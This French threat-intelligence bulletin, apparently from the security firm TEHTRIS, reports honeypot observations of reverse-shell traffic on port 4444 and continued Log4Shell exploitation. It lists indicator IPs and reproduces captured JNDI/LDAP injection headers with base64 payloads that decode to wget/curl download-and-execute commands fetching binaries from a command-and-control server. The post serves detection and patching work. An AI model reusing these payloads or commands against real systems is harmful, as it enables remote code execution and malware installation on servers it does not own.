En semaine 42, TEHTRIS s’est concentré sur l’étude de deux phénomènes malveillants observés sur son réseau de honeypots.
Sommaire
Tentative de communication via reverse shell sur le port 4444
Dans le top 10 des adresses IP effectuant des requêtes malicieuses sur notre réseau de honeypots cette semaine, on trouve les deux IP suivantes :
- 212.2.236[.]244 – AS 62164 (Heymman Servers Corporation) – US
- 23.140.88[.]145 – AS 62164 (Heymman Servers Corporation) – US
Ces deux adresses sont défavorablement connues des bases de données publiques.
Elles ont réalisé 1 275 tentatives en l’espace d’une matinée le 19 octobre 2022 dans toute l’Europe mais ont ciblé principalement des infrastructures allemandes, lituaniennes et finlandaises.
Elles revêtent un intérêt particulier car ces deux IP requêtent l’URL :
45.85.219[.]125:4444
Il s’agit d’un appel vers l’adresse IP 45.85.219[.]125 localisée en Allemagne (enregistrée auprès de l’AS 44486 SYNLINQ) non connue des bases de données publiques en utilisant le port 4444.
Le port 4444 (TCP et UDP) est connu pour être utilisé par les chevaux de Troie et les malwares en général car employé par l’outil de reverse shell très efficace de Metasploit). Il est recommandé de bloquer le trafic vers ce port.
Log4shell toujours activement exploitée
Depuis 3 semaines, TEHTRIS a observé des activités malveillantes sur son réseau de honeypots réalisées par des adresses IP enregistrées auprès de l’AS 31898 ORACLE-BMC-31898 au Brésil. Par exemple, l’adresse IP 168.138.252[.]172 est à l’origine de tentatives d’exploitation du protocole SMB. Mais la découverte la plus intéressante concerne l’IP 168.138.128[.]171 qui est défavorablement connue des bases de données publiques en tant que serveur C2 permettant aux cyber attaquants d’exploiter les vulnérabilités Log4j.
Il s’agit de la vulnérabilité CVE-2021-44228 (CVSS3 : 10), aussi connue sous le nom de Log4shell, qui permet à l’attaquant d’exécuter un code à distance (ou RCE pour Remote Code Execution). Cette vulnérabilité critique concerne Apache Log4J : un logiciel de gestion des journaux utilisé pour le langage Java. Log4J est ainsi utilisé pour gérer les logs des applications en Java, c’est-à-dire pour enregistrer et collectionner les évènements se réalisant dans l’application, par exemple pour écrire toutes les requêtes faites sur un site Internet. L’attaquant a la possibilité de chercher des variables et du contenu pour les afficher.
Cette IP brésilienne est connue des bases de données publiques pour être appelée dans la requête suivante dans le HTTP Header :
t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}
${env:BARFOO:-l}dap${env:BARFOO:-:}//168.138.128[.]171:1389
/TomcatBypass/Command/Base64
/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')
Ou en Base64 Decode:
wget hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
curl -O hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
chmod 777 openvpn; ./openvpn runner)
Sur les honeypots TEHTRIS, voici les Headers complets de la requête observée contenant l’IP C2 lancés par l’IP suisse 179.43.139[.]202 (AS 51852 Private Layer INC – défavorablement connue des bases de données publiques) :
["x-api-version: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
"bearer: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
"x-client-ip: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
'connection: close',
"cf-connecting_ip: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
'accept: application/json, text/plain, */*',
"authentication: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
"originating-ip: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')",
"x-real-ip: t(\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\')"]
Ici, l’attaquant a essayé plusieurs façons d’exploiter la vulnérabilité.
Voici 2 autres exemples connus de requêtes qui pourraient exploiter la vulnérabilité en question :
${jndi:ldap[:]//127.0.0.1[:]389/5j9gclyhuddf8k1712mm0mkwn8kb3h6u/${java:os}/${sys:java.vendor}_${sys:java.version}}
Cette requête fait de la reconnaissance du système sur lequel l’attaque est lancée afin d’obtenir des informations concernant son système d’exploitation ou encore la version utilisée de Java.
${jndi:ldap[:]//168.138.128.171[:]1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}
Cette requête est écrite en base64 et est décodée de cette façon :
wget http[:]//168.138.128.171/perl/idsha1game;
curl -O http[:]//168.138.128.171/perl/idsha1game;
chmod 777 idsha1game; ./idsha1game runner
Pour aller plus loin avec l’ANSSI : https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/
Cette vulnérabilité a beaucoup fait parler d’elle depuis sa découverte fin 2021 et est encore activement exploitée un an après.
TEHTRIS recommande de toujours appliquer les mises à jour de vos logiciels dès qu’elles sont disponibles.